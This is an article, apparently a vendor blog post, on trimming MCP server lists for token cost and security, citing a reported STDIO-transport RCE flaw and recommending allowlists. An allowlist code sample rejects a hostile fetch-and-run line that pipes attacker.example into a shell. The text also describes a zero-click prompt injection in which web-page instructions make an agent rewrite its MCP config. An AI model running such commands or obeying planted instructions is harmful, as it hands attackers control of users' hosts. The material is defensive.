Trim Your MCP Server List Before It Trims Your Agent

Running too many MCP servers has two compounding costs most teams miss: a token overhead of 4-32x and an unpatched RCE flaw in the STDIO transport. Here is what to cut and why.

Connect GitHub, Slack, and Sentry to your coding agent and - before you type a single prompt - roughly 55,000 tokens of tool-schema definitions have already loaded into the context window. That is more than a quarter of Claude's 200k limit, gone before the work starts.

This is the MCP context tax, and teams are only now auditing it. But token overhead is not the only reason to shrink your server list. In April 2026, OX Security disclosed something harder to fix: a systemic RCE flaw baked into the STDIO transport of Anthropic's official MCP SDK - and Anthropic declined to patch it at the protocol level.

Running fewer, more deliberately chosen MCP servers is not a performance tweak. After April, it is a security posture.

Why MCP server security got complicated fast

OX Security's April 2026 disclosure documents a systemic remote code execution vulnerability in Anthropic's MCP SDK that stems not from a coding error but from a deliberate architectural design choice. The flaw is present across all officially supported language SDKs - Python, TypeScript, Java, and Rust - and allows any process command passed to the MCP STDIO interface to execute on the host system.

Anthropic confirmed the behavior as intentional and declined to modify the protocol architecture. The affected supply chain spans an estimated 150 million downloads, more than 7,000 publicly accessible servers, and up to 200,000 vulnerable instances.

The exploitation paths are not theoretical. In the LangFlow case alone, over 915 publicly accessible instances were online with the MCP configuration panel exposed without authentication. An attacker could send a crafted network request and achieve full RCE without ever logging in.

The most unsettling variant is the zero-click case. In CVE-2026-30615, simply visiting an attacker-controlled web page causes Windsurf's AI agent to read hidden prompt-injection instructions, silently edit the user's local MCP configuration file, and trigger RCE on the next agent invocation - with no user approval required. Windsurf was the only tested IDE where the entire sequence completed without any user interaction.

OX tested 11 MCP registries by submitting a proof-of-concept malicious package. Nine of eleven accepted it. That number explains why "just install trusted servers" is not straightforward advice when registry curation is this thin.

Downstream maintainers have been patching independently. Products with assigned CVEs include LiteLLM (CVE-2026-30623), Agent Zero (CVE-2026-30624), Bisheng (CVE-2026-33224), GPT Researcher (CVE-2025-65720), Jaaz (CVE-2026-30616), and LangBot, among others. The pattern is that each team is rediscovering the same allowlist fix in isolation. Because Anthropic treats the behavior as "expected," the shortcoming remains unaddressed in the MCP reference implementation even as individual vendors ship patches, and developers who build on the SDK inherit the code execution risk.
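As a rough illustration of what an allowlist fix can look like, here is a minimal sketch that refuses to launch a STDIO server unless its full command line exactly matches a pre-approved entry. It is not the patch any of the projects above shipped; the function name validate_stdio_launch, the APPROVED_LAUNCHES set, and the package names in it are all hypothetical.

```python
# Hypothetical allowlist of complete launch commands (binary plus every argument).
# Matching the whole argv, not just the binary, matters: "npx" or "python" alone
# can still run arbitrary code depending on the arguments that follow.
APPROVED_LAUNCHES = {
    ("npx", "-y", "@example/mcp-server-files@1.2.3"),
    ("uvx", "example-mcp-server==0.4.0"),
}


def validate_stdio_launch(command: str, args: list[str]) -> list[str]:
    """Return the argv to spawn, or raise ValueError if it is not pre-approved."""
    argv = (command, *args)
    if argv not in APPROVED_LAUNCHES:
        raise ValueError(f"STDIO launch not on allowlist: {argv!r}")
    return list(argv)


# An approved launch passes through unchanged.
safe_argv = validate_stdio_launch("uvx", ["example-mcp-server==0.4.0"])
print(safe_argv)

# Anything else, including an injected shell command, is rejected before spawning.
try:
    validate_stdio_launch("bash", ["-c", "curl https://attacker.example | sh"])
except ValueError as err:
    print(f"blocked: {err}")
```

The check only helps if it runs before the configuration is handed to whatever spawns the subprocess, and if the allowlist itself lives somewhere the agent cannot edit.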

SSE and HTTP transports communicate over network sockets rather than spawning OS subprocesses - they do not use StdioServerParameters and are not affected by the command-injection flaw. Migrating from STDIO to SSE or HTTP eliminates that attack surface entirely, at the cost of added deployment complexity.

The token overhead problem is separate and just as real

Even if the security picture were clean, the economics of a large MCP server list do not work. A benchmark by Scalekit ran 75 head-to-head comparisons - same model (Claude Sonnet 4), same tasks, same prompts - and found MCP costing 4 to 32 times more tokens than CLI for identical operations. Their simplest task, checking a repo's language, consumed 1,365 tokens via CLI and 44,026 via MCP. The overhead is almost entirely schema: 43 tool definitions injected into every conversation, of which the agent uses one or two.
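The arithmetic behind those figures is worth doing once by hand. The sketch below uses only the numbers quoted above; the per-tool average assumes that every extra token is schema and that the schema is spread evenly across the 43 tools, which is a simplification.

```python
# Figures quoted above for Scalekit's simplest task (checking a repo's language).
CLI_TOKENS = 1_365
MCP_TOKENS = 44_026
TOOL_DEFINITIONS = 43

# How many times more tokens the MCP path used for the same task.
overhead_ratio = MCP_TOKENS / CLI_TOKENS

# Tokens spent beyond what the CLI path needed.
extra_tokens = MCP_TOKENS - CLI_TOKENS

# Assumption: all extra tokens are tool schema, divided evenly across the tools.
tokens_per_tool = extra_tokens / TOOL_DEFINITIONS

# Share of the MCP run that was overhead rather than task work.
overhead_share = extra_tokens / MCP_TOKENS

print(f"MCP/CLI ratio:        {overhead_ratio:.1f}x")
print(f"Extra tokens:         {extra_tokens:,}")
print(f"Avg tokens per tool:  {tokens_per_tool:.0f}")
print(f"Overhead share:       {overhead_share:.1%}")
```

On these numbers the simplest task sits at the top of the 4-32x range, and nearly all of the MCP run is overhead rather than work.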

The money translation is direct. Scalekit's replication put the monthly gap at $3.20 via CLI versus $55.20 via MCP at 10,000 operations on Sonnet 4. At team scale, that compounds fast: for a 200-engineer team paying the typical rate, the context tax alone is roughly $220 per working day, or about $55,000 per year, before any productive work tokens.
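To sanity-check the cost figures, the sketch below reworks them from the numbers quoted above. The one value not in the text is WORKING_DAYS_PER_YEAR, set to 250 as an assumption because that is what makes $220 per day line up with about $55,000 per year.

```python
# Monthly cost at 10,000 operations on Sonnet 4, as quoted above.
OPERATIONS_PER_MONTH = 10_000
CLI_MONTHLY_USD = 3.20
MCP_MONTHLY_USD = 55.20

# Cost multiple and the extra spend attributable to each MCP operation.
cost_ratio = MCP_MONTHLY_USD / CLI_MONTHLY_USD
extra_per_operation_usd = (MCP_MONTHLY_USD - CLI_MONTHLY_USD) / OPERATIONS_PER_MONTH

# Team-scale figures quoted above.
TEAM_SIZE = 200
TEAM_DAILY_TAX_USD = 220
WORKING_DAYS_PER_YEAR = 250  # assumption, not stated in the article

per_engineer_daily_usd = TEAM_DAILY_TAX_USD / TEAM_SIZE
annual_tax_usd = TEAM_DAILY_TAX_USD * WORKING_DAYS_PER_YEAR

print(f"MCP costs {cost_ratio:.2f}x the CLI path")
print(f"Extra cost per operation: ${extra_per_operation_usd:.4f}")
print(f"Context tax per engineer per day: ${per_engineer_daily_usd:.2f}")
print(f"Annual team context tax: ${annual_tax_usd:,}")
```

The per-operation difference is a fraction of a cent, which is why the tax tends to go unnoticed until it is multiplied across a team and a year.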

There is also a reliability dimension that rarely comes up in the cost discussion. Of 25 MCP runs in Scalekit's benchmark, 7 failed with ConnectTimeout. CLI ran 25 of 25 successfully. Every failure was a TCP-level timeout - the connection to GitHub's MCP server never completed. CLI agents do not have this problem because the executable runs locally.

What to actually do with your server list this week

The honest version of the MCP ecosystem in production: roughly 200 servers exist, half of them are toys, and the production-grade stack you actually run for daily work is smaller and more boring than the demo videos suggest.

One agency that tracked its production MCP stack for a year settled on eight daily-use servers - Filesystem, Puppeteer, Postgres, Brave, GitHub, Sentry, Notion, and one more - and found that trying fifteen for a month made Claude slower and less accurate due to context window pressure.

A security researcher's corollary: BlueRock Security found 36.7% of public MCP servers carry SSRF vulnerabilities, 41% have no authentication at all, and only 8.5% use OAuth. The "install and forget" posture that most teams have adopted was always wrong; now there is concrete data on what the exposure looks like.

The practical checklist is short. Check each server's transport: if it runs over STDIO and you cannot move it to HTTP, treat it as elevated risk and consider whether you need it at all. Prefer verified, vendor-maintained servers: GitHub, Microsoft Playwright, Figma, Supabase, Stripe, Cloudflare, Linear, Notion, and Sentry are each backed by the company whose name is on the box. These carry the lowest risk, but you should still scope your tokens. For anything else, audit before install and pin to a known-good version.
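The transport check is easy to script. The sketch below assumes a client configuration shaped like the common "mcpServers" JSON layout, where a STDIO server is declared with a "command" key and a network server with a "url" key; your client's format may differ, and the server names and URL here are made up for illustration.

```python
import json

# Hypothetical client configuration; adjust the shape to match your MCP client.
EXAMPLE_CONFIG = json.loads("""
{
  "mcpServers": {
    "github":      {"url": "https://mcp.example.com/github"},
    "local-files": {"command": "npx", "args": ["-y", "@example/mcp-server-files@1.2.3"]},
    "mystery":     {}
  }
}
""")


def audit_transports(config: dict) -> dict[str, str]:
    """Label each configured server as 'stdio', 'http', or 'unknown'."""
    report = {}
    for name, entry in config.get("mcpServers", {}).items():
        if "command" in entry:
            report[name] = "stdio"  # spawns a local subprocess
        elif "url" in entry:
            report[name] = "http"   # talks over a network socket
        else:
            report[name] = "unknown"
    return report


report = audit_transports(EXAMPLE_CONFIG)
stdio_servers = sorted(name for name, kind in report.items() if kind == "stdio")

for name, kind in report.items():
    print(f"{name}: {kind}")
print("Review first (STDIO):", stdio_servers)
```

Anything labelled stdio or unknown goes to the top of the review pile; the http entries still need token scoping.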

On the token side, allow-listing pays off immediately. Most MCP clients let you allow-list which tools a server exposes, and doing so cuts roughly 80% of the GitHub MCP server's schema overhead with no code changes. The saving scales with what you drop: if you load 5 of 50 tool definitions, you pay roughly one tenth of the original schema cost on every turn.
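The 5-of-50 claim can be checked with a toy model. The sketch below builds 50 synthetic tool definitions of identical size, keeps five by name, and compares estimated token counts. The four-characters-per-token estimate is a crude assumption, and real schemas vary widely in size, so treat the output as an illustration of the proportion rather than a measurement.

```python
import json


def estimate_tokens(payload) -> int:
    """Crude size estimate. Assumption: roughly 4 characters per token."""
    return len(json.dumps(payload)) // 4


def filter_tools(tools: list[dict], allowed: set[str]) -> list[dict]:
    """Keep only the tool definitions whose name is on the allow-list."""
    return [tool for tool in tools if tool["name"] in allowed]


# 50 synthetic, equally sized tool definitions (hypothetical names and schema).
all_tools = [
    {
        "name": f"tool_{i:02d}",
        "description": "Hypothetical tool used only to size the schema.",
        "inputSchema": {
            "type": "object",
            "properties": {"query": {"type": "string"}},
            "required": ["query"],
        },
    }
    for i in range(50)
]

allowed_names = {f"tool_{i:02d}" for i in range(5)}
kept = filter_tools(all_tools, allowed_names)

before = estimate_tokens(all_tools)
after = estimate_tokens(kept)
fraction = after / before

print(f"Tools loaded: {len(kept)} of {len(all_tools)}")
print(f"Estimated schema tokens: {before} -> {after} ({fraction:.0%} of original)")
```

With uniform tool sizes the saving is proportional to the number of tools dropped; in a real server the heaviest schemas matter most, so it is worth measuring which definitions are actually large before choosing what to keep.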

A teammate like Beagle - which operates inside Slack rather than wiring into your filesystem - sidesteps the STDIO exposure entirely, since its integrations run over authenticated HTTP rather than local subprocesses.

The broader point is that MCP selection was always a judgment call. It just used to be judged only on features. The OX disclosure adds a second dimension to every server on your list: not just "does it do what I need?" but "what does it have permission to execute on my host?"

The MCP ecosystem is, in NimbleBrain's 2026 analysis, where web security was in 2005: functional but immature. The gap between adoption pace and security maturity has been visible for months; April made it measurable. A shorter, audited server list is not a concession to caution. It is how you run a production agent stack with a defensible surface area.
